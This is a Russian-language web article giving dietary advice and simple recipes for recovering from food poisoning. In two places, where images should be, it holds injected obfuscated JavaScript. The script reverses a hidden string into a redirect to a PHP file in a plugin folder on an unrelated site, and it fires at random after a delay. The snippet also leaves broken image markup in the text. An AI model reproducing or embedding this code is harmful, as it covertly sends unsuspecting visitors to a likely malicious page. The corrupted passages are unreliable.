Диета при пищевом отравлении и после него: рекомендации и рецепты

Как правило, человек достаточно тяжело переносит пищевое отравление и связанно это, прежде всего, с тем, что в данном состоянии наблюдается неприятная симптоматика. Несмотря на то, что в большинстве случаев больной испытывает тошноту и слабость, все же организм нуждается в подпитке, а значит принимать пищу нужно, хоть и осторожно. В первые часы при отравлении рекомендуется отказаться от еды и сделать упор на воду, постепенно переходя на щадящий режим питания.

Пищевое отравление считается одной из древнейших болезней на земле. Это не удивительно, так как даже несколько десятилетий назад условия для хранения продуктов сильно отличались от современных.

Рекомендуемое питание

$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2015/04/124-365×244.jpg» alt=» нежирное мясо» width=»365″ height=»244″ /> На следующий день после отравления можно потихоньку вводить нежирное мясо

Рекомендуется в первые часы после отравления пить несладкий горячий чай и есть в небольших количествах обычные сухарики. Постепенно в рацион добавляются нежирный бульон из курицы и картофельное пюре. Не рекомендуется употреблять масло и молоко. Больного можно накормить жидкими кашками, приготовленными только на воде. Подойдет гречневая и рисовая крупа, а также манка. Для начала следует употреблять еду в небольших количествах, чтобы не нагружать желудок лишней работой.

На другой день после отравления больному можно предложить в небольших количествах отварное нежирное мясо. Подойдет телятина или курица. Допускается употребление котлет, но только приготовленных на пару. В качестве десерта рекомендуется фруктовый кисель или желе. Следует отметить, что питание в первые дни после отравления должно быть дробным. Пищу следует употреблять в небольших количествах несколько раз в день.

Основные возбудители пищевого отравления могут попасть в продукты как из почвы и воды, так и через грязные руки и посредством насекомых. В редких случаях вредные микробы проникают в мясо или молоко вследствие какого-либо заболевания самого животного.

В первые дни после пищевого отравления следует полностью исключить из рациона больного фрукты и овощи. Также не рекомендуется есть жирную, жареную, сладкую и острую пищу, а кроме этого молоко и масло. Категорически противопоказано употребление алкоголя, даже в небольших количествах. Постепенно организм пойдет на поправку и человек сам перейдет на привычный рацион.

Рацион больного после отравления

После того, как уйдут все основные симптомы отравления, необходимо будет максимально восстановить свои силы и запитать организм полезными бактериями. Для этого следует перейти на полноценное, но осторожное питание. Рекомендуется включить в рацион больного различные кисломолочные продукты, такие как йогурт, кефир, ряженку и так далее.

Следует больше употреблять овощных супов-пюре, мясо в отварном виде или паровые котлеты. Подойдут паровые котлеты из рыбы. Также благотворно на организме скажется употребление запеченного творога, например, суфле, запеканки или пудинги. Рекомендуется есть рисовые и гречневые каши, овощи, но только отварные или запеченные. В качестве десерта подойдет зеленый чай и сухие сорта печенья.

До полного выздоровления следует питаться небольшими порциями, но как можно больше раз в день. Чтобы облегчить нагрузку на желудок, пищу следует измельчать или тщательно пережевывать. Кроме этого еда должна подаваться в теплом виде, так как холодные или горячие блюда раздражают еще не до конца окрепшую слизистую оболочку пищеварительного тракта.

Рекомендации и рецепты

$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2015/04/Котлеты-из-рыбы-и-овощей.jpg» alt=»Котлеты из рыбы» width=»330″ height=»250″ /> Паровые котлетки — отличный вариант для меню после пищевого отравления

В первый день после отравления рекомендуется насушить в духовке белый хлеб и давать его больному вместе с несладким чаем. На ночь можно сделать пюре или манную кашу на воде. Далее следует наварить несладкий компот из сухофруктов или кисель, подойдет и желе из фруктов. Следует постепенно вводить в рацион мясные и рыбные блюда, кисломолочные продукты, яйца.

Большая часть микробных ядов проникает в клетки желудка спустя тридцать минут после приема пищи. Это вызывает у человека рвоту и понос — основные симптомы пищевого отравления.

Для того чтобы приготовить вкусные диетические котлеты из рыбы потребуется филе белой рыбы, белый хлеб, яйца и мука. Белый хлеб следует замочить в воде, тщательно перемолоть филе рыбы и все это смешать между собой, добавив яйца и муку. Далее потребуется слепить небольшие котлетки и варить на пару до готовности.

Для приготовления парных котлет из телятины необходимо будет взять фарш самой телятины, манную крупу и яйца. Далее все это следует тщательно смешать между собой и сформировать котлетки небольших размеров. Готовить на пароварке следует в течение тридцати минут. Куриные котлеты готовятся точно также, только фарш заменяется куриным.

Больному можно приготовить творожную запеканку. Для этого понадобится нежирный творог, яйца и манка. Творог необходимо будет тщательно размять при помощи блендера, после чего добавить яйцо и манку. Далее следует замесить тесто до однородной консистенции и выложить в чашу. Готовить можно, как в духовке, так и в мультиварке.

В первые дни после отравления больному можно предложить паровой омлет. Для его приготовления потребуются яйца и молоко. Необходимо будет тщательно взбить яйца и влить в них молоко. После этого полученную смесь перелить в формочку, которую не следует смазывать маслом, так как этот продукт употреблять не рекомендуется. Формочку следует поставить на дуршлаг, погруженный в воду, чтобы получилась водяная баня и варить до готовности.

Порадовать больного можно замечательным десертом в виде печеных яблок с творогом. Для их приготовления следует взять нежирный творог и яблоки. Из яблок понадобится удалить сердцевину вместе с косточками и начинить их творогом. Далее следует выложить яблоки на противень и поставить в разогретую до двухсот градусов духовку на тридцать минут.

При соблюдении всех рекомендаций и диетическом питании, улучшение состояния больного должно наступить на пятый день. После этого можно сократить количество приемов пищи и увеличить сами порции. Следует помнить, что правильное питание значительно сократит период восстановления после отравления и снизит урон, который был нанесен организму.

Adblock
detector